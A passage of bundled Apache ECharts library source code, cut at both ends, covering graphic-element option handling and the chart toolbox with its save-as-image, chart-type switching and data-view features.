{\n            delete elOption[name];\n        }\n    );\n    return elOption;\n}\n\nfunction isSetLoc(obj, props) {\n    var isSet;\n    each$1(props, function (prop) {\n        obj[prop] != null && obj[prop] !== 'auto' && (isSet = true);\n    });\n    return isSet;\n}\n\nfunction setKeyInfoToNewElOption(resultItem, newElOption) {\n    var existElOption = resultItem.exist;\n\n    // Set id and type after id assigned.\n    newElOption.id = resultItem.keyInfo.id;\n    !newElOption.type && existElOption && (newElOption.type = existElOption.type);\n\n    // Set parent id if not specified\n    if (newElOption.parentId == null) {\n        var newElParentOption = newElOption.parentOption;\n        if (newElParentOption) {\n            newElOption.parentId = newElParentOption.id;\n        }\n        else if (existElOption) {\n            newElOption.parentId = existElOption.parentId;\n        }\n    }\n\n    // Clear\n    newElOption.parentOption = null;\n}\n\nfunction mergeNewElOptionToExist(existList, index, newElOption) {\n    // Update existing options, for `getOption` feature.\n    var newElOptCopy = extend({}, newElOption);\n    var existElOption = existList[index];\n\n    var $action = newElOption.$action || 'merge';\n    if ($action === 'merge') {\n        if (existElOption) {\n\n            if (__DEV__) {\n                var newType = newElOption.type;\n                assert$1(\n                    !newType || existElOption.type === newType,\n                    'Please set $action: \"replace\" to change `type`'\n                );\n            }\n\n            // We can ensure that newElOptCopy and existElOption are not\n            // the same object, so `merge` will not change newElOptCopy.\n            merge(existElOption, newElOptCopy, true);\n            // Rigid body, use ignoreSize.\n            mergeLayoutParam(existElOption, newElOptCopy, {ignoreSize: true});\n            // Will be used in render.\n            copyLayoutParams(newElOption, existElOption);\n        }\n        else {\n            existList[index] = newElOptCopy;\n        }\n    }\n    else if ($action === 'replace') {\n        existList[index] = newElOptCopy;\n    }\n    else if ($action === 'remove') {\n        // null will be cleaned later.\n        existElOption && (existList[index] = null);\n    }\n}\n\nfunction setLayoutInfoToExist(existItem, newElOption) {\n    if (!existItem) {\n        return;\n    }\n    existItem.hv = newElOption.hv = [\n        // Rigid body, dont care `width`.\n        isSetLoc(newElOption, ['left', 'right']),\n        // Rigid body, dont care `height`.\n        isSetLoc(newElOption, ['top', 'bottom'])\n    ];\n    // Give default group size. Otherwise layout error may occur.\n    if (existItem.type === 'group') {\n        existItem.width == null && (existItem.width = newElOption.width = 0);\n        existItem.height == null && (existItem.height = newElOption.height = 0);\n    }\n}\n\nfunction setEventData(el, graphicModel, elOption) {\n    var eventData = el.eventData;\n    // Simple optimize for large amount of elements that no need event.\n    if (!el.silent && !el.ignore && !eventData) {\n        eventData = el.eventData = {\n            componentType: 'graphic',\n            componentIndex: graphicModel.componentIndex,\n            name: el.name\n        };\n    }\n\n    // `elOption.info` enables user to mount some info on\n    // elements and use them in event handlers.\n    if (eventData) {\n        eventData.info = el.info;\n    }\n}\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n\nvar features = {};\n\nfunction register$1(name, ctor) {\n    features[name] = ctor;\n}\n\nfunction get$1(name) {\n    return features[name];\n}\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nvar ToolboxModel = extendComponentModel({\n\n    type: 'toolbox',\n\n    layoutMode: {\n        type: 'box',\n        ignoreSize: true\n    },\n\n    optionUpdated: function () {\n        ToolboxModel.superApply(this, 'optionUpdated', arguments);\n\n        each$1(this.option.feature, function (featureOpt, featureName) {\n            var Feature = get$1(featureName);\n            Feature && merge(featureOpt, Feature.defaultOption);\n        });\n    },\n\n    defaultOption: {\n\n        show: true,\n\n        z: 6,\n\n        zlevel: 0,\n\n        orient: 'horizontal',\n\n        left: 'right',\n\n        top: 'top',\n\n        // right\n        // bottom\n\n        backgroundColor: 'transparent',\n\n        borderColor: '#ccc',\n\n        borderRadius: 0,\n\n        borderWidth: 0,\n\n        padding: 5,\n\n        itemSize: 15,\n\n        itemGap: 8,\n\n        showTitle: true,\n\n        iconStyle: {\n            borderColor: '#666',\n            color: 'none'\n        },\n        emphasis: {\n            iconStyle: {\n                borderColor: '#3E98C5'\n            }\n        },\n        // textStyle: {},\n\n        // feature\n\n        tooltip: {\n            show: false\n        }\n    }\n});\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n/**\n * Layout list like component.\n * It will box layout each items in group of component and then position the whole group in the viewport\n * @param {module:zrender/group/Group} group\n * @param {module:echarts/model/Component} componentModel\n * @param {module:echarts/ExtensionAPI}\n */\nfunction layout$3(group, componentModel, api) {\n    var boxLayoutParams = componentModel.getBoxLayoutParams();\n    var padding = componentModel.get('padding');\n    var viewportSize = {width: api.getWidth(), height: api.getHeight()};\n\n    var rect = getLayoutRect(\n        boxLayoutParams,\n        viewportSize,\n        padding\n    );\n\n    box(\n        componentModel.get('orient'),\n        group,\n        componentModel.get('itemGap'),\n        rect.width,\n        rect.height\n    );\n\n    positionElement(\n        group,\n        boxLayoutParams,\n        viewportSize,\n        padding\n    );\n}\n\nfunction makeBackground(rect, componentModel) {\n    var padding = normalizeCssArray$1(\n        componentModel.get('padding')\n    );\n    var style = componentModel.getItemStyle(['color', 'opacity']);\n    style.fill = componentModel.get('backgroundColor');\n    var rect = new Rect({\n        shape: {\n            x: rect.x - padding[3],\n            y: rect.y - padding[0],\n            width: rect.width + padding[1] + padding[3],\n            height: rect.height + padding[0] + padding[2],\n            r: componentModel.get('borderRadius')\n        },\n        style: style,\n        silent: true,\n        z2: -1\n    });\n    // FIXME\n    // `subPixelOptimizeRect` may bring some gap between edge of viewpart\n    // and background rect when setting like `left: 0`, `top: 0`.\n    // graphic.subPixelOptimizeRect(rect);\n\n    return rect;\n}\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nextendComponentView({\n\n    type: 'toolbox',\n\n    render: function (toolboxModel, ecModel, api, payload) {\n        var group = this.group;\n        group.removeAll();\n\n        if (!toolboxModel.get('show')) {\n            return;\n        }\n\n        var itemSize = +toolboxModel.get('itemSize');\n        var featureOpts = toolboxModel.get('feature') || {};\n        var features = this._features || (this._features = {});\n\n        var featureNames = [];\n        each$1(featureOpts, function (opt, name) {\n            featureNames.push(name);\n        });\n\n        (new DataDiffer(this._featureNames || [], featureNames))\n            .add(processFeature)\n            .update(processFeature)\n            .remove(curry(processFeature, null))\n            .execute();\n\n        // Keep for diff.\n        this._featureNames = featureNames;\n\n        function processFeature(newIndex, oldIndex) {\n            var featureName = featureNames[newIndex];\n            var oldName = featureNames[oldIndex];\n            var featureOpt = featureOpts[featureName];\n            var featureModel = new Model(featureOpt, toolboxModel, toolboxModel.ecModel);\n            var feature;\n\n            // FIX#11236, merge feature title from MagicType newOption. TODO: consider seriesIndex ?\n            if (payload && payload.newTitle != null) {\n                featureOpt.title = payload.newTitle;\n            }\n\n            if (featureName && !oldName) { // Create\n                if (isUserFeatureName(featureName)) {\n                    feature = {\n                        model: featureModel,\n                        onclick: featureModel.option.onclick,\n                        featureName: featureName\n                    };\n                }\n                else {\n                    var Feature = get$1(featureName);\n                    if (!Feature) {\n                        return;\n                    }\n                    feature = new Feature(featureModel, ecModel, api);\n                }\n                features[featureName] = feature;\n            }\n            else {\n                feature = features[oldName];\n                // If feature does not exsit.\n                if (!feature) {\n                    return;\n                }\n                feature.model = featureModel;\n                feature.ecModel = ecModel;\n                feature.api = api;\n            }\n\n            if (!featureName && oldName) {\n                feature.dispose && feature.dispose(ecModel, api);\n                return;\n            }\n\n            if (!featureModel.get('show') || feature.unusable) {\n                feature.remove && feature.remove(ecModel, api);\n                return;\n            }\n\n            createIconPaths(featureModel, feature, featureName);\n\n            featureModel.setIconStatus = function (iconName, status) {\n                var option = this.option;\n                var iconPaths = this.iconPaths;\n                option.iconStatus = option.iconStatus || {};\n                option.iconStatus[iconName] = status;\n                // FIXME\n                iconPaths[iconName] && iconPaths[iconName].trigger(status);\n            };\n\n            if (feature.render) {\n                feature.render(featureModel, ecModel, api, payload);\n            }\n        }\n\n        function createIconPaths(featureModel, feature, featureName) {\n            var iconStyleModel = featureModel.getModel('iconStyle');\n            var iconStyleEmphasisModel = featureModel.getModel('emphasis.iconStyle');\n\n            // If one feature has mutiple icon. they are orginaized as\n            // {\n            //     icon: {\n            //         foo: '',\n            //         bar: ''\n            //     },\n            //     title: {\n            //         foo: '',\n            //         bar: ''\n            //     }\n            // }\n            var icons = feature.getIcons ? feature.getIcons() : featureModel.get('icon');\n            var titles = featureModel.get('title') || {};\n            if (typeof icons === 'string') {\n                var icon = icons;\n                var title = titles;\n                icons = {};\n                titles = {};\n                icons[featureName] = icon;\n                titles[featureName] = title;\n            }\n            var iconPaths = featureModel.iconPaths = {};\n            each$1(icons, function (iconStr, iconName) {\n                var path = createIcon(\n                    iconStr,\n                    {},\n                    {\n                        x: -itemSize / 2,\n                        y: -itemSize / 2,\n                        width: itemSize,\n                        height: itemSize\n                    }\n                );\n                path.setStyle(iconStyleModel.getItemStyle());\n                path.hoverStyle = iconStyleEmphasisModel.getItemStyle();\n\n                // Text position calculation\n                path.setStyle({\n                    text: titles[iconName],\n                    textAlign: iconStyleEmphasisModel.get('textAlign'),\n                    textBorderRadius: iconStyleEmphasisModel.get('textBorderRadius'),\n                    textPadding: iconStyleEmphasisModel.get('textPadding'),\n                    textFill: null\n                });\n\n                var tooltipModel = toolboxModel.getModel('tooltip');\n                if (tooltipModel && tooltipModel.get('show')) {\n                    path.attr('tooltip', extend({\n                        content: titles[iconName],\n                        formatter: tooltipModel.get('formatter', true)\n                            || function () {\n                                return titles[iconName];\n                            },\n                        formatterParams: {\n                            componentType: 'toolbox',\n                            name: iconName,\n                            title: titles[iconName],\n                            $vars: ['name', 'title']\n                        },\n                        position: tooltipModel.get('position', true) || 'bottom'\n                    }, tooltipModel.option));\n                }\n\n                setHoverStyle(path);\n\n                if (toolboxModel.get('showTitle')) {\n                    path.__title = titles[iconName];\n                    path.on('mouseover', function () {\n                            // Should not reuse above hoverStyle, which might be modified.\n                            var hoverStyle = iconStyleEmphasisModel.getItemStyle();\n                            var defaultTextPosition = toolboxModel.get('orient') === 'vertical'\n                                ? (toolboxModel.get('right') == null ? 'right' : 'left')\n                                : (toolboxModel.get('bottom') == null ? 'bottom' : 'top');\n                            path.setStyle({\n                                textFill: iconStyleEmphasisModel.get('textFill')\n                                    || hoverStyle.fill || hoverStyle.stroke || '#000',\n                                textBackgroundColor: iconStyleEmphasisModel.get('textBackgroundColor'),\n                                textPosition: iconStyleEmphasisModel.get('textPosition') || defaultTextPosition\n                            });\n                        })\n                        .on('mouseout', function () {\n                            path.setStyle({\n                                textFill: null,\n                                textBackgroundColor: null\n                            });\n                        });\n                }\n                path.trigger(featureModel.get('iconStatus.' + iconName) || 'normal');\n\n                group.add(path);\n                path.on('click', bind(\n                    feature.onclick, feature, ecModel, api, iconName\n                ));\n\n                iconPaths[iconName] = path;\n            });\n        }\n\n        layout$3(group, toolboxModel, api);\n        // Render background after group is layout\n        // FIXME\n        group.add(makeBackground(group.getBoundingRect(), toolboxModel));\n\n        // Adjust icon title positions to avoid them out of screen\n        group.eachChild(function (icon) {\n            var titleText = icon.__title;\n            var hoverStyle = icon.hoverStyle;\n            // May be background element\n            if (hoverStyle && titleText) {\n                var rect = getBoundingRect(\n                    titleText, makeFont(hoverStyle)\n                );\n                var offsetX = icon.position[0] + group.position[0];\n                var offsetY = icon.position[1] + group.position[1] + itemSize;\n\n                var needPutOnTop = false;\n                if (offsetY + rect.height > api.getHeight()) {\n                    hoverStyle.textPosition = 'top';\n                    needPutOnTop = true;\n                }\n                var topOffset = needPutOnTop ? (-5 - rect.height) : (itemSize + 8);\n                if (offsetX + rect.width / 2 > api.getWidth()) {\n                    hoverStyle.textPosition = ['100%', topOffset];\n                    hoverStyle.textAlign = 'right';\n                }\n                else if (offsetX - rect.width / 2 < 0) {\n                    hoverStyle.textPosition = [0, topOffset];\n                    hoverStyle.textAlign = 'left';\n                }\n            }\n        });\n    },\n\n    updateView: function (toolboxModel, ecModel, api, payload) {\n        each$1(this._features, function (feature) {\n            feature.updateView && feature.updateView(feature.model, ecModel, api, payload);\n        });\n    },\n\n    // updateLayout: function (toolboxModel, ecModel, api, payload) {\n    //     zrUtil.each(this._features, function (feature) {\n    //         feature.updateLayout && feature.updateLayout(feature.model, ecModel, api, payload);\n    //     });\n    // },\n\n    remove: function (ecModel, api) {\n        each$1(this._features, function (feature) {\n            feature.remove && feature.remove(ecModel, api);\n        });\n        this.group.removeAll();\n    },\n\n    dispose: function (ecModel, api) {\n        each$1(this._features, function (feature) {\n            feature.dispose && feature.dispose(ecModel, api);\n        });\n    }\n});\n\nfunction isUserFeatureName(featureName) {\n    return featureName.indexOf('my') === 0;\n}\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n/* global Uint8Array */\n\nvar saveAsImageLang = lang.toolbox.saveAsImage;\n\nfunction SaveAsImage(model) {\n    this.model = model;\n}\n\nSaveAsImage.defaultOption = {\n    show: true,\n    icon: 'M4.7,22.9L29.3,45.5L54.7,23.4M4.6,43.6L4.6,58L53.8,58L53.8,43.6M29.2,45.1L29.2,0',\n    title: saveAsImageLang.title,\n    type: 'png',\n    // Default use option.backgroundColor\n    // backgroundColor: '#fff',\n    connectedBackgroundColor: '#fff',\n    name: '',\n    excludeComponents: ['toolbox'],\n    pixelRatio: 1,\n    lang: saveAsImageLang.lang.slice()\n};\n\nSaveAsImage.prototype.unusable = !env$1.canvasSupported;\n\nvar proto$2 = SaveAsImage.prototype;\n\nproto$2.onclick = function (ecModel, api) {\n    var model = this.model;\n    var title = model.get('name') || ecModel.get('title.0.text') || 'echarts';\n    var type = model.get('type', true) || 'png';\n    var url = api.getConnectedDataURL({\n        type: type,\n        backgroundColor: model.get('backgroundColor', true)\n            || ecModel.get('backgroundColor') || '#fff',\n        connectedBackgroundColor: model.get('connectedBackgroundColor'),\n        excludeComponents: model.get('excludeComponents'),\n        pixelRatio: model.get('pixelRatio')\n    });\n    // Chrome and Firefox\n    if (typeof MouseEvent === 'function' && !env$1.browser.ie && !env$1.browser.edge) {\n        var $a = document.createElement('a');\n        $a.download = title + '.' + type;\n        $a.target = '_blank';\n        $a.href = url;\n        var evt = new MouseEvent('click', {\n            view: window,\n            bubbles: true,\n            cancelable: false\n        });\n        $a.dispatchEvent(evt);\n    }\n    // IE\n    else {\n        if (window.navigator.msSaveOrOpenBlob) {\n            var bstr = atob(url.split(',')[1]);\n            var n = bstr.length;\n            var u8arr = new Uint8Array(n);\n            while (n--) {\n                u8arr[n] = bstr.charCodeAt(n);\n            }\n            var blob = new Blob([u8arr]);\n            window.navigator.msSaveOrOpenBlob(blob, title + '.' + type);\n        }\n        else {\n            var lang$$1 = model.get('lang');\n            var html = ''\n                + '<body style=\"margin:0;\">'\n                + '<img src=\"' + url + '\" style=\"max-width:100%;\" title=\"' + ((lang$$1 && lang$$1[0]) || '') + '\" />'\n                + '</body>';\n            var tab = window.open();\n            tab.document.write(html);\n        }\n    }\n};\n\nregister$1(\n    'saveAsImage', SaveAsImage\n);\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nvar magicTypeLang = lang.toolbox.magicType;\nvar INNER_STACK_KEYWORD = '__ec_magicType_stack__';\n\nfunction MagicType(model) {\n    this.model = model;\n}\n\nMagicType.defaultOption = {\n    show: true,\n    type: [],\n    // Icon group\n    icon: {\n        /* eslint-disable */\n        line: 'M4.1,28.9h7.1l9.3-22l7.4,38l9.7-19.7l3,12.8h14.9M4.1,58h51.4',\n        bar: 'M6.7,22.9h10V48h-10V22.9zM24.9,13h10v35h-10V13zM43.2,2h10v46h-10V2zM3.1,58h53.7',\n        stack: 'M8.2,38.4l-8.4,4.1l30.6,15.3L60,42.5l-8.1-4.1l-21.5,11L8.2,38.4z M51.9,30l-8.1,4.2l-13.4,6.9l-13.9-6.9L8.2,30l-8.4,4.2l8.4,4.2l22.2,11l21.5-11l8.1-4.2L51.9,30z M51.9,21.7l-8.1,4.2L35.7,30l-5.3,2.8L24.9,30l-8.4-4.1l-8.3-4.2l-8.4,4.2L8.2,30l8.3,4.2l13.9,6.9l13.4-6.9l8.1-4.2l8.1-4.1L51.9,21.7zM30.4,2.2L-0.2,17.5l8.4,4.1l8.3,4.2l8.4,4.2l5.5,2.7l5.3-2.7l8.1-4.2l8.1-4.2l8.1-4.1L30.4,2.2z' // jshint ignore:line\n        /* eslint-enable */\n    },\n    // `line`, `bar`, `stack`, `tiled`\n    title: clone(magicTypeLang.title),\n    option: {},\n    seriesIndex: {}\n};\n\nvar proto$3 = MagicType.prototype;\n\nproto$3.getIcons = function () {\n    var model = this.model;\n    var availableIcons = model.get('icon');\n    var icons = {};\n    each$1(model.get('type'), function (type) {\n        if (availableIcons[type]) {\n            icons[type] = availableIcons[type];\n        }\n    });\n    return icons;\n};\n\nvar seriesOptGenreator = {\n    'line': function (seriesType, seriesId, seriesModel, model) {\n        if (seriesType === 'bar') {\n            return merge({\n                id: seriesId,\n                type: 'line',\n                // Preserve data related option\n                data: seriesModel.get('data'),\n                stack: seriesModel.get('stack'),\n                markPoint: seriesModel.get('markPoint'),\n                markLine: seriesModel.get('markLine')\n            }, model.get('option.line') || {}, true);\n        }\n    },\n    'bar': function (seriesType, seriesId, seriesModel, model) {\n        if (seriesType === 'line') {\n            return merge({\n                id: seriesId,\n                type: 'bar',\n                // Preserve data related option\n                data: seriesModel.get('data'),\n                stack: seriesModel.get('stack'),\n                markPoint: seriesModel.get('markPoint'),\n                markLine: seriesModel.get('markLine')\n            }, model.get('option.bar') || {}, true);\n        }\n    },\n    'stack': function (seriesType, seriesId, seriesModel, model) {\n        var isStack = seriesModel.get('stack') === INNER_STACK_KEYWORD;\n        if (seriesType === 'line' || seriesType === 'bar') {\n            model.setIconStatus('stack', isStack ? 'normal' : 'emphasis');\n            return merge({\n                id: seriesId,\n                stack: isStack ? '' : INNER_STACK_KEYWORD\n            }, model.get('option.stack') || {}, true);\n        }\n    }\n};\n\nvar radioTypes = [\n    ['line', 'bar'],\n    ['stack']\n];\n\nproto$3.onclick = function (ecModel, api, type) {\n    var model = this.model;\n    var seriesIndex = model.get('seriesIndex.' + type);\n    // Not supported magicType\n    if (!seriesOptGenreator[type]) {\n        return;\n    }\n    var newOption = {\n        series: []\n    };\n    var generateNewSeriesTypes = function (seriesModel) {\n        var seriesType = seriesModel.subType;\n        var seriesId = seriesModel.id;\n        var newSeriesOpt = seriesOptGenreator[type](\n            seriesType, seriesId, seriesModel, model\n        );\n        if (newSeriesOpt) {\n            // PENDING If merge original option?\n            defaults(newSeriesOpt, seriesModel.option);\n            newOption.series.push(newSeriesOpt);\n        }\n        // Modify boundaryGap\n        var coordSys = seriesModel.coordinateSystem;\n        if (coordSys && coordSys.type === 'cartesian2d' && (type === 'line' || type === 'bar')) {\n            var categoryAxis = coordSys.getAxesByScale('ordinal')[0];\n            if (categoryAxis) {\n                var axisDim = categoryAxis.dim;\n                var axisType = axisDim + 'Axis';\n                var axisModel = ecModel.queryComponents({\n                    mainType: axisType,\n                    index: seriesModel.get(name + 'Index'),\n                    id: seriesModel.get(name + 'Id')\n                })[0];\n                var axisIndex = axisModel.componentIndex;\n\n                newOption[axisType] = newOption[axisType] || [];\n                for (var i = 0; i <= axisIndex; i++) {\n                    newOption[axisType][axisIndex] = newOption[axisType][axisIndex] || {};\n                }\n                newOption[axisType][axisIndex].boundaryGap = type === 'bar';\n            }\n        }\n    };\n\n    each$1(radioTypes, function (radio) {\n        if (indexOf(radio, type) >= 0) {\n            each$1(radio, function (item) {\n                model.setIconStatus(item, 'normal');\n            });\n        }\n    });\n\n    model.setIconStatus(type, 'emphasis');\n\n    ecModel.eachComponent(\n        {\n            mainType: 'series',\n            query: seriesIndex == null ? null : {\n                seriesIndex: seriesIndex\n            }\n        }, generateNewSeriesTypes\n    );\n\n    var newTitle;\n    // Change title of stack\n    if (type === 'stack') {\n        var isStack = newOption.series && newOption.series[0] && newOption.series[0].stack === INNER_STACK_KEYWORD;\n        newTitle = isStack\n            ? merge({ stack: magicTypeLang.title.tiled }, magicTypeLang.title)\n            : clone(magicTypeLang.title);\n    }\n\n    api.dispatchAction({\n        type: 'changeMagicType',\n        currentType: type,\n        newOption: newOption,\n        newTitle: newTitle\n    });\n};\n\nregisterAction({\n    type: 'changeMagicType',\n    event: 'magicTypeChanged',\n    update: 'prepareAndUpdate'\n}, function (payload, ecModel) {\n    ecModel.mergeOption(payload.newOption);\n});\n\nregister$1('magicType', MagicType);\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nvar dataViewLang = lang.toolbox.dataView;\n\nvar BLOCK_SPLITER = new Array(60).join('-');\nvar ITEM_SPLITER = '\\t';\n/**\n * Group series into two types\n *  1. on category axis, like line, bar\n *  2. others, like scatter, pie\n * @param {module:echarts/model/Global} ecModel\n * @return {Object}\n * @inner\n */\nfunction groupSeries(ecModel) {\n    var seriesGroupByCategoryAxis = {};\n    var otherSeries = [];\n    var meta = [];\n    ecModel.eachRawSeries(function (seriesModel) {\n        var coordSys = seriesModel.coordinateSystem;\n\n        if (coordSys && (coordSys.type === 'cartesian2d' || coordSys.type === 'polar')) {\n            var baseAxis = coordSys.getBaseAxis();\n            if (baseAxis.type === 'category') {\n                var key = baseAxis.dim + '_' + baseAxis.index;\n                if (!seriesGroupByCategoryAxis[key]) {\n                    seriesGroupByCategoryAxis[key] = {\n                        categoryAxis: baseAxis,\n                        valueAxis: coordSys.getOtherAxis(baseAxis),\n                        series: []\n                    };\n                    meta.push({\n                        axisDim: baseAxis.dim,\n                        axisIndex: baseAxis.index\n                    });\n                }\n                seriesGroupByCategoryAxis[key].series.push(seriesModel);\n            }\n            else {\n                otherSeries.push(seriesModel);\n            }\n        }\n        else {\n            otherSeries.push(seriesModel);\n        }\n    });\n\n    return {\n        seriesGroupByCategoryAxis: seriesGroupByCategoryAxis,\n        other: otherSeries,\n        meta: meta\n    };\n}\n\n/**\n * Assemble content of series on cateogory axis\n * @param {Array.<module:echarts/model/Series>} series\n * @return {string}\n * @inner\n */\nfunction assembleSeriesWithCategoryAxis(series) {\n    var tables = [];\n    each$1(series, function (group, key) {\n        var categoryAxis = group.categoryAxis;\n        var valueAxis = group.valueAxis;\n        var valueAxisDim = valueAxis.dim;\n\n        var headers = [' '].concat(map(group.series, function (series) {\n            return series.name;\n        }));\n        var columns = [categoryAxis.model.getCategories()];\n        each$1(group.series, function (series) {\n            columns.push(series.getRawData().mapArray(valueAxisDim, function (val) {\n                return val;\n            }));\n        });\n        // Assemble table content\n        var lines = [headers.join(ITEM_SPLITER)];\n        for (var i = 0; i < columns[0].length; i++) {\n            var items = [];\n            for (var j = 0; j < columns.length; j++) {\n                items.push(columns[j][i]);\n            }\n            lines.push(items.join(ITEM_SPLITER));\n        }\n        tables.push(lines.join('\\n'));\n    });\n    return tables.join('\\n\\n' + BLOCK_SPLITER + '\\n\\n');\n}\n\n/**\n * Assemble content of other series\n * @param {Array.<module:echarts/model/Series>} series\n * @return {string}\n * @inner\n */\nfunction assembleOtherSeries(series) {\n    return map(series, function (series) {\n        var data = series.getRawData();\n        var lines = [series.name];\n        var vals = [];\n        data.each(data.dimensions, function () {\n            var argLen = arguments.length;\n            var dataIndex = arguments[argLen - 1];\n            var name = data.getName(dataIndex);\n            for (var i = 0; i < argLen - 1; i++) {\n                vals[i] = arguments[i];\n            }\n            lines.push((name ? (name + ITEM_SPLITER) : '') + vals.join(ITEM_SPLITER));\n        });\n        return lines.join('\\n');\n    }).join('\\n\\n' + BLOCK_SPLITER + '\\n\\n');\n}\n\n/**\n * @param {module:echarts/model/Global}\n * @return {Object}\n * @inner\n */\nfunction getContentFromModel(ecModel) {\n\n    var result = groupSeries(ecModel);\n\n    return {\n        value: filter([\n                assembleSeriesWithCategoryAxis(result.seriesGroupByCategoryAxis),\n                assembleOtherSeries(result.other)\n            ], function (str) {\n                return str.replace(/[\\n\\t\\s]/g, '');\n            }).join('\\n\\n' + BLOCK_SPLITER + '\\n\\n'),\n\n        meta: result.meta\n    };\n}\n\n\nfunction trim$1(str) {\n    return str.replace(/^\\s\\s*/, '').replace(/\\s\\s*$/, '');\n}\n/**\n * If a block is tsv format\n */\nfunction isTSVFormat(block) {\n    // Simple method to find out if a block is tsv format\n    var firstLine = block.slice(0, block.indexOf('\\n'));\n    if (firstLine.indexOf(ITEM_SPLITER) >= 0) {\n        return true;\n    }\n}\n\nvar itemSplitRegex = new RegExp('[' + ITEM_SPLITER + ']+', 'g');\n/**\n * @param {string} tsv\n * @return {Object}\n */\nfunction parseTSVContents(tsv) {\n    var tsvLines = tsv.split(/\\n+/g);\n    var headers = trim$1(tsvLines.shift()).split(itemSplitRegex);\n\n    var categories = [];\n    var series = map(headers, function (header) {\n        return {\n            name: header,\n            data: []\n        };\n    });\n    for (var i = 0; i < tsvLines.length; i++) {\n        var items = trim$1(tsvLines[i]).split(itemSplitRegex);\n        categories.push(items.shift());\n        for (var j = 0; j < items.length; j++) {\n            series[j] && (series[j].data[i] = items[j]);\n        }\n    }\n    return {\n        series: series,\n        categories: categories\n    };\n}\n\n/**\n * @param {string} str\n * @return {Array.<Object>}\n * @inner\n */\nfunction parseListContents(str) {\n    var lines = str.split(/\\n+/g);\n    var seriesName = trim$1(lines.shift());\n\n    var data = [];\n    for (var i = 0; i < lines.length; i++) {\n        var items = trim$1(lines[i]).split(itemSplitRegex);\n        var name = '';\n        var value;\n        var hasName = false;\n        if (isNaN(items[0])) { // First item is name\n            hasName = true;\n            name = items[0];\n            items = items.slice(1);\n            data[i] = {\n                name: name,\n                value: []\n            };\n            value = data[i].value;\n        }\n        else {\n            value = data[i] = [];\n        }\n        for (var j = 0; j < items.length; j++) {\n            value.push(+items[j]);\n        }\n        if (value.length === 1) {\n            hasName ? (data[i].value = value[0]) : (data[i] = value[0]);\n        }\n    }\n\n    return {\n        name: seriesName,\n        data: data\n    };\n}\n\n/**\n * @param {string} str\n * @param {Array.<Object>} blockMetaList\n * @return {Object}\n * @inner\n */\nfunction parseContents(str, blockMetaList) {\n    var blocks = str.split(new 